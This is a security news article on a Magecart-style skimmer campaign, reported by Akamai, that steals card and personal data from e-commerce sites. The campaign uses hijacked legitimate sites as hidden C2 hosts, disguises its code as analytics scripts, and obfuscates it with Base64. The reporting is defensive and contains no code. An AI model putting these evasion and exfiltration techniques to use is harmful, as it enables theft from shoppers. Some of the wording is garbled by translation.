Cybersecurity researchers have discovered an ongoing campaign of a new Magecart-style web skimmer designed to steal personally identifiable information (PII) and credit card data from e-commerce websites.
An important aspect that sets it apart from other Magecart campaigns is that the hijacked site then functions as a “makeshift” command-and-control (C2) server, using cloaks to facilitate the distribution of malicious code without the victim site’s knowledge.
Web security firm Akamai says it has identified victims of varying sizes in North America, Latin America and Europe, potentially putting the personal data of thousands of site visitors at risk of being harvested and sold for illegal profit.
“The attacker used a number of evasion techniques during the campaign, including obfuscating (using) Base64 and disguising the attack to resemble popular third-party services, such as Google Analytics or Google Tag Manager,” Akamai security researcher Roman Lvovsky said.
In short, the idea is to penetrate a vulnerable legitimate site and use it to host web skimmer code, thereby leveraging the genuine domain’s good reputation to their advantage. In some cases, the attacks have been going on for almost a month.
“Instead of using the attacker’s own C2 servers to host malicious code, which may be flagged as a malicious domain, attackers hack (using vulnerabilities or any other means at their disposal) legitimate and vulnerable sites, such as small or medium-sized retail sites, and store their code in it,” said Akamai.
The result of such attacks are two types of victims: legitimate sites that have been compromised to act as malware “distribution centers” and vulnerable e-commerce websites that are targeted by skimmers.
In some cases, websites are not only targets for data theft, but unknowingly serve as a vehicle for spreading malware to other vulnerable websites.
“These attacks included exploits for Magento, WooCommerce, WordPress, and Shopify, demonstrating the growing diversity of vulnerabilities and abused digital commerce platforms,” said Lvovsky.
By leveraging the established beliefs websites have accumulated over time, this technique creates a “smoke screen” that makes it difficult to identify and respond to such attacks.
🔐 Mastering API Security: Understanding Your True Attack Surface
Discover untapped vulnerabilities in your API ecosystem and take proactive steps towards tight security. Join our insightful webinar!
Campaigns also adopt other methods to avoid detection. This includes disguising the skimmer’s code as a third-party service such as Google Tag Manager or Facebook Pixel to hide its true intent.
The obfuscated code skimmer, which comes in two different variants, is equipped to intercept and extract PII and credit card details as encoded strings via HTTP requests to actor-controlled servers.
“Exfiltration will only occur once for each user making a payment,” said Lvovsky. “Once a user’s information is stolen, the script will flag the browser to ensure it doesn’t steal the information twice (to reduce suspicious network traffic). This further increases the reluctance of this Magecart style attack.